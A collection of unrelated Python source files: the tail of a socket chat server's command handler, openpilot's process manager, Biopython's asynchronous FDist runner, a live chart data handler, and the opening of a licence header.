elif msg[:len('[COMMAND] MSG ')] == '[COMMAND] MSG ':
tmp = msg[len('[COMMAND] MSG '):]
# Separate all the different recipients included in the command.
user_to_send = []
index = tmp.find(';')
while index != -1:
user_to_send += [tmp[:index]]
tmp = tmp[index + 1:]
index = tmp.find(';')
index = tmp.find(' ')
if index == -1:
user.send('Error: Improper usage of the command MSG.\n* /MSG <nick1;nick2;...> <message>: send a private message to one or several user(s) in current channel')
else:
user_to_send += [tmp[:index]]
tmp = tmp[index + 1:]
# Once done, send the message to all of them, using a different appearence to differentiate them from normal messages.
for e in user_to_send:
result = user.find_user(e)
if result != None:
user.send(STYLE_DIM + 'To ' + result.format_nick + COLOR_DEFAULT + ': ' + tmp + STYLE_DIM_RESET, sys = False)
result.send(STYLE_DIM + 'From ' + user.format_nick + COLOR_DEFAULT + ': ' + tmp + STYLE_DIM_RESET, sys = False)
else:
user.send(e + ' is not currently connected or is not in your current channel.')
elif msg == '[COMMAND] BYE':
print(user.address + ' has left.')
user.send('Goodbye ' + user.format_nick + '!')
del_user(user)
break
elif msg == '[COMMAND] CURRENT':
tmp = 'You are currently in the channel "' + user.current.name + '".\n'
tmp += 'You are also member of the following channels:\n'
for channel in user.channels:
if user in channel.members and channel.name != user.current.name:
tmp += ' - ' + channel.name + '\n'
user.send(tmp)
elif msg[:len('[COMMAND] CURRENT ')] == '[COMMAND] CURRENT ':
desired_channel = msg[len('[COMMAND] CURRENT '):]
tmp = user.find_channel(desired_channel)
if tmp != None:
if user in tmp.members:
if user.current != tmp:
user.switch(tmp)
else:
user.send('Error: You are already in this channel.')
else:
user.send('Error: You are not member of this channel. Use /JOIN ' + tmp.name + ', to joint this channel.')
else:
user.send('Error: This channel does not exists. You can create it using the command /JOIN ' + desired_channel)
elif msg[:len('[COMMAND] NICK ')] == '[COMMAND] NICK ':
desired_nickname = msg[len('[COMMAND] NICK '):]
user.change_nick(desired_nickname)
elif msg[:len('[COMMAND] GRANT ')] == '[COMMAND] GRANT ':
desired_admin = msg[len('[COMMAND] GRANT '):]
if user in user.current.admins:
result = user.find_user(desired_admin)
if result != None:
if result not in result.current.admins:
result.current.admins += [result]
result.refresh_format_nick()
result.send(user.format_nick + ' granted you the Admin title!')
result.send_channel(result.format_nick + ' is now Admin.', to_self = False)
else:
user.send(desired_admin + ' is already Admin.')
else:
user.send(desired_admin + ' is not currently connected or is not in your current channel.')
else:
user.send('You are not allowed to use this command!')
elif msg[:len('[COMMAND] REVOKE ')] == '[COMMAND] REVOKE ':
desired_admin = msg[len('[COMMAND] REVOKE '):]
if user in user.current.admins:
result = user.find_user(desired_admin)
if result != None:
if result in result.current.admins:
if not result.superadmin:
result.current.admins.remove(result)
result.refresh_format_nick()
result.send(user.format_nick + ' revoked your Admin title!')
result.send_channel(result.format_nick + ' is no longer an Admin.', to_self = False)
else:
user.send('You are not allowed to revoke a SuperAdmin!')
else:
user.send(desired_admin + ' is not an Admin.')
else:
user.send(desired_admin + ' is not currently connected or is not in your current channel.')
else:
user.send('You are not allowed to use this command!')
elif msg[:len('[COMMAND] KICK ')] == '[COMMAND] KICK ':
desired_nickname = msg[len('[COMMAND] KICK '):]
if user in user.current.admins:
user.kick(desired_nickname)
else:
user.send('You are not allowed to use this command!')
elif msg[:len('[COMMAND] REN ')] == '[COMMAND] REN ':
desired_name = msg[len('[COMMAND] REN '):]
if user in user.current.admins:
if user.current.name != 'MAIN':
user.send_channel('This channel is now called ' + user.current.name, to_currents_only = True)
user.send_channel('The channel ' + user.current.name + ' is now called ' + user.current.name, to_non_currents_only = True)
user.current.name = desired_name
else:
user.send('You cannot change the channel "MAIN" name.\nSorry, even admin\'s powers have limits.')
else:
user.send('You are not allowed to use this command!')
elif msg[:len('[COMMAND] SHOUT ')] == '[COMMAND] SHOUT ':
desired_msg = msg[len('[COMMAND] SHOUT '):]
if user.superadmin:
user.send_all('\n\n' + desired_msg)
else:
user.send('You are not allowed to use this command!')
elif msg[:len('[COMMAND] BAN ')] == '[COMMAND] BAN ':
desired_user = msg[len('[COMMAND] BAN '):]
if user.superadmin:
result = user.find_user(desired_user)
if result != None:
result.send('You have been banned from this server by ' + user.format_nick + '!')
user.send_all(result.format_nick + ' has been banned from this server')
user.banned += [result.address]
del_user(result)
else:
user.send(desired_admin + ' is not currently connected or is not in your current channel.')
else:
user.send('You are not allowed to use this command!')
elif msg[:len('[COMMAND] ')] == '[COMMAND] ':
user.send('The command /' + msg[len('[COMMAND] '):] + ' is not recognized.\nYou can type /HELP to display all available commands.')
# If the message isn't a command, it must be a normal message. Sends it to everyone on all the channels the user has joined.
else:
user.send_channel(user.format_nick + COLOR_DEFAULT + ': ' + msg, sys = False, to_currents_only = True)
user.send_channel('[' + user.current.name + '] ' + user.format_nick + COLOR_DEFAULT + ': ' + msg, sys = False, to_non_currents_only = True)
host = ''
port = 1459
buffer_size = 1500
server = socket(AF_INET, SOCK_STREAM)
server.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
server.bind((host, port))
server.listen(10)
print('The server has succefully launched. Now waiting for client connection...')
thread = Thread(target=accept_incoming_connections)
thread.start()
thread.join()
server.close()
|
manager.py
|
#!/usr/bin/env python3
import os
import time
import sys
import fcntl
import errno
import signal
import shutil
import subprocess
import datetime
import textwrap
from typing import Dict, List
from selfdrive.swaglog import cloudlog, add_logentries_handler
from common.basedir import BASEDIR, PARAMS
from common.hardware import HARDWARE, ANDROID, PC
WEBCAM = os.getenv("WEBCAM") is not None
sys.path.append(os.path.join(BASEDIR, "pyextra"))
os.environ['BASEDIR'] = BASEDIR
TOTAL_SCONS_NODES = 1005
prebuilt = os.path.exists(os.path.join(BASEDIR, 'prebuilt'))
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
if ANDROID:
os.chmod("/dev/shm", 0o777)
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL,
fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat.decode('utf8'))
except (OSError, IOError, UnicodeDecodeError):
pass
# os.wait() returns a tuple with the pid and a 16 bit value
# whose low byte is the signal number and whose high byte is the exit satus
exit_status = os.wait()[1] >> 8
os._exit(exit_status)
if __name__ == "__main__":
unblock_stdout()
from common.spinner import Spinner
from common.text_window import TextWindow
import importlib
import traceback
from multiprocessing import Process
# Run scons
spinner = Spinner(noop=(__name__ != "__main__" or not ANDROID))
spinner.update("0")
if not prebuilt:
for retry in [True, False]:
# run scons
env = os.environ.copy()
env['SCONS_PROGRESS'] = "1"
env['SCONS_CACHE'] = "1"
nproc = os.cpu_count()
j_flag = "" if nproc is None else "-j%d" % (nproc - 1)
scons = subprocess.Popen(["scons", j_flag], cwd=BASEDIR, env=env, stderr=subprocess.PIPE)
compile_output = []
# Read progress from stderr and update spinner
while scons.poll() is None:
try:
line = scons.stderr.readline() # type: ignore
if line is None:
continue
line = line.rstrip()
prefix = b'progress: '
if line.startswith(prefix):
i = int(line[len(prefix):])
if spinner is not None:
spinner.update("%d" % (70.0 * (i / TOTAL_SCONS_NODES)))
elif len(line):
compile_output.append(line)
print(line.decode('utf8', 'replace'))
except Exception:
pass
if scons.returncode != 0:
# Read remaining output
r = scons.stderr.read().split(b'\n') # type: ignore
compile_output += r
if retry:
if not os.getenv("CI"):
print("scons build failed, cleaning in")
for i in range(3, -1, -1):
print("....%d" % i)
time.sleep(1)
subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env)
shutil.rmtree("/tmp/scons_cache")
else:
print("scons build failed after retry")
sys.exit(1)
else:
# Build failed log errors
errors = [line.decode('utf8', 'replace') for line in compile_output
if any([err in line for err in [b'error: ', b'not found, needed by target']])]
error_s = "\n".join(errors)
add_logentries_handler(cloudlog)
cloudlog.error("scons build failed\n" + error_s)
# Show TextWindow
no_ui = __name__ != "__main__" or not ANDROID
error_s = "\n \n".join(["\n".join(textwrap.wrap(e, 65)) for e in errors])
with TextWindow("openpilot failed to build\n \n" + error_s, noop=no_ui) as t:
t.wait_for_exit()
exit(1)
else:
break
import cereal
import cereal.messaging as messaging
from common.params import Params
import selfdrive.crash as crash
from selfdrive.registration import register
from selfdrive.version import version, dirty
from selfdrive.loggerd.config import ROOT
from selfdrive.launcher import launcher
from common.apk import update_apks, pm_apply_packages, start_offroad
ThermalStatus = cereal.log.ThermalData.ThermalStatus
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald.thermald",
"uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"dmonitoringd": "selfdrive.monitoring.dmonitoringd",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"locationd": "selfdrive.locationd.locationd",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./ui"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": "selfdrive.locationd.paramsd",
"camerad": ("selfdrive/camerad", ["./camerad"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"clocksd": ("selfdrive/clocksd", ["./clocksd"]),
"gpsd": ("selfdrive/sensord", ["./gpsd"]),
"updated": "selfdrive.updated",
"dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]),
"modeld": ("selfdrive/modeld", ["./modeld"]),
}
daemon_processes = {
"manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"),
}
running: Dict[str, Process] = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption
unkillable_processes = ['camerad']
# processes to end with SIGINT instead of SIGTERM
interrupt_processes: List[str] = []
# processes to end with SIGKILL instead of SIGTERM
kill_processes = ['sensord']
# processes to end if thermal conditions exceed Green parameters
green_temp_processes = ['uploader']
persistent_processes = [
'thermald',
'logmessaged',
'ui',
'uploader',
]
if not PC:
persistent_processes += [
'logcatd',
'tombstoned',
]
if ANDROID:
persistent_processes += [
'updated',
'deleter',
]
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'radard',
'dmonitoringd',
'calibrationd',
'paramsd',
'camerad',
'modeld',
'proclogd',
'ubloxd',
'locationd',
'clocksd',
]
driver_view_processes = [
'camerad',
'dmonitoringd',
'dmonitoringmodeld'
]
if WEBCAM:
car_started_processes += [
'dmonitoringmodeld',
]
if not PC:
car_started_processes += [
'sensord',
'dmonitoringmodeld',
]
if ANDROID:
car_started_processes += [
'gpsd',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
print("registering %s" % name)
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
# ****************** process management functions ******************
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def start_daemon_process(name):
params = Params()
proc, pid_param = daemon_processes[name]
pid = params.get(pid_param, encoding='utf-8')
if pid is not None:
try:
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if proc in f.read():
# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info("starting daemon %s" % name)
proc = subprocess.Popen(['python', '-m', proc], # pylint: disable=subprocess-popen-preexec-fn
stdin=open('/dev/null', 'r'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(pid_param, str(proc.pid))
def prepare_managed_process(p):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
elif os.path.isfile(os.path.join(BASEDIR, proc[0], "Makefile")):
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# make clean if the build failed
cloudlog.warning("building %s failed, make clean" % (proc, ))
subprocess.check_call(["make", "clean"], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
def join_process(process, timeout):
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.time()
while time.time() - t < timeout and process.exitcode is None:
time.sleep(0.001)
def kill_managed_process(name):
if name not in running or name not in managed_processes:
return
cloudlog.info("killing %s" % name)
if running[name].exitcode is None:
if name in interrupt_processes:
os.kill(running[name].pid, signal.SIGINT)
elif name in kill_processes:
os.kill(running[name].pid, signal.SIGKILL)
else:
running[name].terminate()
join_process(running[name], 5)
if running[name].exitcode is None:
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
join_process(running[name], 15)
if running[name].exitcode is None:
cloudlog.critical("unkillable process %s failed to die!" % name)
# TODO: Use method from HARDWARE
if ANDROID:
cloudlog.critical("FORCE REBOOTING PHONE!")
os.system("date >> /sdcard/unkillable_reboot")
os.system("reboot")
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
del running[name]
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
if ANDROID:
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
def send_managed_process_signal(name, sig):
if name not in running or name not in managed_processes:
return
cloudlog.info(f"sending signal {sig} to {name}")
os.kill(running[name].pid, sig)
# ****************** run loop ******************
def manager_init(should_register=True):
if should_register:
reg_res = register()
if reg_res:
dongle_id = reg_res
else:
raise Exception("server registration failed")
else:
dongle_id = "c"*16
# set dongle id
cloudlog.info("dongle id is " + dongle_id)
os.environ['DONGLE_ID'] = dongle_id
cloudlog.info("dirty is %d" % dirty)
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
# ensure shared libraries are readable by apks
if ANDROID:
os.chmod(BASEDIR, 0o755)
os.chmod(os.path.join(BASEDIR, "cereal"), 0o755)
os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755)
def manager_thread():
# now loop
thermal_sock = messaging.sub_sock('thermal')
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
params = Params()
# start daemon processes
for p in daemon_processes:
start_daemon_process(p)
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start offroad
if ANDROID:
pm_apply_packages('enable')
start_offroad()
if os.getenv("NOBOARD") is None:
start_managed_process("pandad")
if os.getenv("BLOCK") is not None:
for k in os.getenv("BLOCK").split(","):
del managed_processes[k]
started_prev = False
logger_dead = False
while 1:
msg = messaging.recv_sock(thermal_sock, wait=True)
# heavyweight batch processes are gated on favorable thermal conditions
if msg.thermal.thermalStatus >= ThermalStatus.yellow:
for p in green_temp_processes:
if p in persistent_processes:
kill_managed_process(p)
else:
for p in green_temp_processes:
if p in persistent_processes:
start_managed_process(p)
if msg.thermal.freeSpace < 0.05:
logger_dead = True
if msg.thermal.started:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
driver_view = params.get("IsDriverViewEnabled") == b"1"
# TODO: refactor how manager manages processes
for p in reversed(car_started_processes):
if p not in driver_view_processes or not driver_view:
kill_managed_process(p)
for p in driver_view_processes:
if driver_view:
start_managed_process(p)
else:
kill_managed_process(p)
# trigger an update after going offroad
if started_prev:
send_managed_process_signal("updated", signal.SIGHUP)
started_prev = msg.thermal.started
# check the status of all processes, did any of them die?
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running]
cloudlog.debug(' '.join(running_list))
# Exit main loop when uninstall is needed
if params.get("DoUninstall", encoding='utf8') == "1":
break
def manager_prepare(spinner=None):
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
# Spinner has to start from 70 here
total = 100.0 if prebuilt else 30.0
for i, p in enumerate(managed_processes):
if spinner is not None:
spinner.update("%d" % ((100.0 - total) + total * (i + 1) / len(managed_processes),))
prepare_managed_process(p)
def uninstall():
cloudlog.warning("uninstalling")
with open('/cache/recovery/command', 'w') as f:
f.write('--wipe_data\n')
# IPowerManager.reboot(confirm=false, reason="recovery", wait=true)
HARDWARE.reboot(reason="recovery")
def main():
os.environ['PARAMS_PATH'] = PARAMS
if ANDROID:
# the flippening!
os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1')
# disable bluetooth
os.system('service call bluetooth_manager 8')
params = Params()
params.manager_start()
default_params = [
("CommunityFeaturesToggle", "0"),
("CompletedTrainingVersion", "0"),
("IsRHD", "0"),
("IsMetric", "0"),
("RecordFront", "0"),
("HasAcceptedTerms", "0"),
("HasCompletedSetup", "0"),
("IsUploadRawEnabled", "1"),
("IsLdwEnabled", "1"),
("IsGeofenceEnabled", "-1"),
("SpeedLimitOffset", "0"),
("LongitudinalControl", "0"),
("LimitSetSpeed", "0"),
("LimitSetSpeedNeural", "0"),
("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')),
("OpenpilotEnabledToggle", "1"),
("LaneChangeEnabled", "1"),
("IsDriverViewEnabled", "0"),
]
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this chffrplus?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
if ANDROID:
update_apks()
manager_init()
manager_prepare(spinner)
spinner.close()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall", encoding='utf8') == "1":
uninstall()
if __name__ == "__main__":
try:
main()
except Exception:
add_logentries_handler(cloudlog)
cloudlog.exception("Manager failed to start")
# Show last 3 lines of traceback
error = traceback.format_exc(3)
error = "Manager failed to start\n \n" + error
with TextWindow(error) as t:
t.wait_for_exit()
raise
# manual exit because we are forked
sys.exit(0)
|
Async.py
|
# Copyright 2007 by Tiago Antao <tiagoantao@gmail.com>. All rights reserved.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""Asynchronous execution of Fdist and spliting of loads.
FDistAsync Allows for the execution of FDist.
SplitFDist splits a single Fdist execution in several, taking advantage
of multi-core architectures.
"""
import os
import shutil
import threading
from time import sleep
from Bio.PopGen.Async import Local
from Bio.PopGen.FDist.Controller import FDistController
__docformat__ = "restructuredtext en"
class FDistAsync(FDistController):
"""Asynchronous FDist execution.
"""
def __init__(self, fdist_dir="", ext=None):
"""Constructor.
Parameters:
- fdist_dir - Where fdist can be found, if = "", then it
should be on the path.
- ext - Extension of binary names (e.g. nothing on Unix,
".exe" on Windows
"""
FDistController.__init__(self, fdist_dir, ext)
def run_job(self, parameters, input_files):
"""Runs FDist asynchronously.
Gets typical Fdist parameters from a dictionary and
makes a "normal" call. This is run, normally, inside
a separate thread.
"""
npops = parameters['npops']
nsamples = parameters['nsamples']
fst = parameters['fst']
sample_size = parameters['sample_size']
mut = parameters.get('mut', 0)
num_sims = parameters.get('num_sims', 20000)
data_dir = parameters.get('data_dir', '.')
is_dominant = parameters.get('is_dominant', False)
theta = parameters.get('theta', 0.06)
beta = parameters.get('beta', (0.25, 0.25))
max_freq = parameters.get('max_freq', 0.99)
fst = self.run_fdist(npops, nsamples, fst, sample_size,
mut, num_sims, data_dir,
is_dominant, theta, beta,
max_freq)
output_files = {}
output_files['out.dat'] = open(data_dir + os.sep + 'out.dat', 'r')
return fst, output_files
class SplitFDist(object):
"""Splits a FDist run.
The idea is to split a certain number of simulations in smaller
numbers (e.g. 30.000 sims split in 30 packets of 1.000). This
allows to run simulations in parallel, thus taking advantage
of multi-core CPUs.
Each SplitFDist object can only be used to run a single FDist
simulation.
"""
def __init__(self, report_fun=None,
num_thr=2, split_size=1000, fdist_dir='', ext=None):
"""Constructor.
Parameters:
- report_fun - Function that is called when a single packet is
run, it should have a single parameter: Fst.
- num_thr - Number of desired threads, typically the number
of cores.
- split_size - Size that a full simulation will be split in.
- ext - Binary extension name (e.g. nothing on Unix, '.exe' on
Windows).
"""
self.async = Local.Local(num_thr)
self.async.hooks['fdist'] = FDistAsync(fdist_dir, ext)
self.report_fun = report_fun
self.split_size = split_size
# There might be races when reporting...
def monitor(self):
"""Monitors and reports (using report_fun) execution.
Every time a partial simulation ends, calls report_fun.
IMPORTANT: monitor calls can be concurrent with other
events, ie, a tasks might end while report_fun is being
called. This means that report_fun should be consider that
other events might be happening while it is running (it
can call acquire/release if necessary).
"""
while(True):
sleep(1)
self.async.access_ds.acquire()
keys = list(self.async.done.keys()) # copy it
self.async.access_ds.release()
for done in keys:
self.async.access_ds.acquire()
fst, files = self.async.done[done]
del self.async.done[done]
out_dat = files['out.dat']
f = open(self.data_dir + os.sep + 'out.dat', 'a')
f.writelines(out_dat.readlines())
f.close()
out_dat.close()
self.async.access_ds.release()
for file in os.listdir(self.parts[done]):
os.remove(self.parts[done] + os.sep + file)
os.rmdir(self.parts[done])
if self.report_fun:
self.report_fun(fst)
self.async.access_ds.acquire()
if len(self.async.waiting) == 0 and len(self.async.running) == 0 \
and len(self.async.done) == 0:
break
self.async.access_ds.release()
def acquire(self):
"""Allows the external acquisition of the lock.
"""
self.async.access_ds.acquire()
def release(self):
"""Allows the external release of the lock.
"""
self.async.access_ds.release()
# You can only run a fdist case at a time
def run_fdist(self, npops, nsamples, fst, sample_size,
mut=0, num_sims=20000, data_dir='.',
is_dominant=False, theta=0.06, beta=(0.25, 0.25),
max_freq=0.99):
"""Runs FDist.
Parameters can be seen on FDistController.run_fdist.
It will split a single execution in several parts and
create separated data directories.
"""
num_parts = num_sims // self.split_size
self.parts = {}
self.data_dir = data_dir
for directory in range(num_parts):
full_path = data_dir + os.sep + str(directory)
try:
os.mkdir(full_path)
except OSError:
pass # Its ok, if it is already there
if "ss_file" in os.listdir(data_dir):
shutil.copy(data_dir + os.sep + "ss_file", full_path)
id = self.async.run_program('fdist', {
'npops': npops,
'nsamples': nsamples,
'fst': fst,
'sample_size': sample_size,
'mut': mut,
'num_sims': self.split_size,
'data_dir': full_path,
'is_dominant': is_dominant,
'theta': theta,
'beta': beta,
'max_freq': max_freq
}, {})
self.parts[id] = full_path
threading.Thread(target=self.monitor).run()
|
datahandler.py
|
import time
import logging
from enum import Enum
from threading import Thread, Lock
from tornado import gen
import pandas as pd
_logger = logging.getLogger(__name__)
class UpdateType(Enum):
ADD = 1,
UPDATE = 2,
class LiveDataHandler:
'''
Handler for live data
'''
def __init__(self, doc, app, figid, lookback, fill_gaps=True, timeout=1):
# doc of client
self._doc = doc
# app instance
self._app = app
# figurepage id
self._figid = figid
# lookback length
self._lookback = lookback
# should gaps be filled
self._fill_gaps = fill_gaps
# timeout for thread
self._timeout = timeout
# figurepage
self._figurepage = app.get_figurepage(figid)
# thread to process new data
self._thread = Thread(target=self._t_thread, daemon=True)
self._lock = Lock()
self._running = True
self._new_data = False
self._datastore = None
self._last_idx = -1
self._patches = []
self._cb_patch = None
self._cb_add = None
# inital fill of datastore
self._fill()
# start thread
self._thread.start()
def _fill(self):
'''
Fills datastore with latest values
'''
df = self._app.generate_data(
figid=self._figid,
back=self._lookback,
preserveidx=True,
fill_gaps=self._fill_gaps)
self._set_data(df)
# init by calling set_cds_columns_from_df
# after this, all cds will already contain data
self._figurepage.set_cds_columns_from_df(self._datastore)
def _set_data(self, data, idx=None):
'''
Replaces or appends data to datastore
'''
with self._lock:
if isinstance(data, pd.DataFrame):
self._datastore = data
self._last_idx = -1
elif isinstance(data, pd.Series):
if idx is None:
self._datastore = self._datastore.append(data)
else:
self._datastore.at[idx] = data
else:
raise Exception('Unsupported data provided')
self._datastore = self._datastore.tail(
self._get_data_stream_length())
@gen.coroutine
def _cb_push_adds(self):
'''
Streams new data to all ColumnDataSources
'''
# take all rows from datastore that were not yet streamed
update_df = self._datastore[self._datastore['index'] > self._last_idx]
# skip if we don't have new data
if update_df.shape[0] == 0:
return
# store last index of streamed data
self._last_idx = update_df['index'].iloc[-1]
fp = self._figurepage
# create stream data for figurepage
data = fp.get_cds_streamdata_from_df(update_df)
if data:
_logger.debug(f'Sending stream for figurepage: {data}')
fp.cds.stream(
data, self._get_data_stream_length())
# create stream df for every figure
for f in fp.figures:
data = f.get_cds_streamdata_from_df(update_df)
if data:
_logger.debug(f'Sending stream for figure: {data}')
f.cds.stream(data, self._get_data_stream_length())
@gen.coroutine
def _cb_push_patches(self):
'''
Pushes patches to all ColumnDataSources
'''
# get all rows to patch
patches = []
while len(self._patches) > 0:
patches.append(self._patches.pop(0))
# skip if no patches available
if len(patches) == 0:
return
for patch in patches:
fp = self._figurepage
# patch figurepage
p_data, s_data = fp.get_cds_patchdata_from_series(patch)
if len(p_data) > 0:
_logger.debug(f'Sending patch for figurepage: {p_data}')
fp.cds.patch(p_data)
if len(s_data) > 0:
_logger.debug(f'Sending stream for figurepage: {s_data}')
fp.cds.stream(
s_data, self._get_data_stream_length())
# patch all figures
for f in fp.figures:
# only fill with nan if not filling gaps
if not self._fill_gaps:
c_fill_nan = f.fill_nan()
else:
c_fill_nan = []
# get patch data
p_data, s_data = f.get_cds_patchdata_from_series(
patch, c_fill_nan)
if len(p_data) > 0:
_logger.debug(f'Sending patch for figure: {p_data}')
f.cds.patch(p_data)
if len(s_data) > 0:
_logger.debug(f'Sending stream for figure: {s_data}')
f.cds.stream(
s_data, self._get_data_stream_length())
def _push_adds(self):
doc = self._doc
try:
doc.remove_next_tick_callback(self._cb_add)
except ValueError:
pass
self._cb_add = doc.add_next_tick_callback(
self._cb_push_adds)
def _push_patches(self):
doc = self._doc
try:
doc.remove_next_tick_callback(self._cb_patch)
except ValueError:
pass
self._cb_patch = doc.add_next_tick_callback(
self._cb_push_patches)
def _process(self, rows):
'''
Request to update data with given rows
'''
for idx, row in rows.iterrows():
if (self._datastore.shape[0] > 0
and idx in self._datastore['index']):
update_type = UpdateType.UPDATE
else:
update_type = UpdateType.ADD
if update_type == UpdateType.UPDATE:
ds_idx = self._datastore.loc[
self._datastore['index'] == idx].index[0]
self._set_data(row, ds_idx)
self._patches.append(row)
self._push_patches()
else:
# append data and remove old data
self._set_data(row)
self._push_adds()
def _t_thread(self):
'''
Thread method for datahandler
'''
while self._running:
if self._new_data:
last_idx = self.get_last_idx()
last_avail_idx = self._app.get_last_idx(self._figid)
if last_avail_idx - last_idx > (2 * self._lookback):
# if there is more new data then lookback length
# don't load from last index but from end of data
data = self._app.generate_data(
back=self._lookback,
preserveidx=True,
fill_gaps=self._fill_gaps)
else:
# if there is just some new data (less then lookback)
# load from last index, so no data is skipped
data = self._app.generate_data(
start=last_idx,
preserveidx=True,
fill_gaps=self._fill_gaps)
self._new_data = False
self._process(data)
time.sleep(self._timeout)
def _get_data_stream_length(self):
'''
Returns the length of data stream to use
'''
return min(self._lookback, self._datastore.shape[0])
def get_last_idx(self):
'''
Returns the last index in local datastore
'''
if self._datastore.shape[0] > 0:
return self._datastore['index'].iloc[-1]
return -1
def set(self, df):
'''
Sets a new df and streams data
'''
self._set_data(df)
self._push_adds()
def update(self):
'''
Notifies datahandler of new data
'''
if self._running:
self._new_data = True
def stop(self):
'''
Stops the datahandler
'''
# mark as not running
self._running = False
# ensure no pending calls are set
try:
self._doc.remove_next_tick_callback(self._cb_patch)
except ValueError:
pass
try:
self._doc.remove_next_tick_callback(self._cb_add)
except ValueError:
pass
# it would not really be neccessary to join this thread but doing
# it for readability
self._thread.join(0)
|
staticfiles.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (C) 2015 Jolla Ltd.
# Contact: Jussi Pakkanen <jussi.pakkanen@jolla.com>
# All rights reserved.
#
# You may use this file under the terms of BSD license as follows:
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
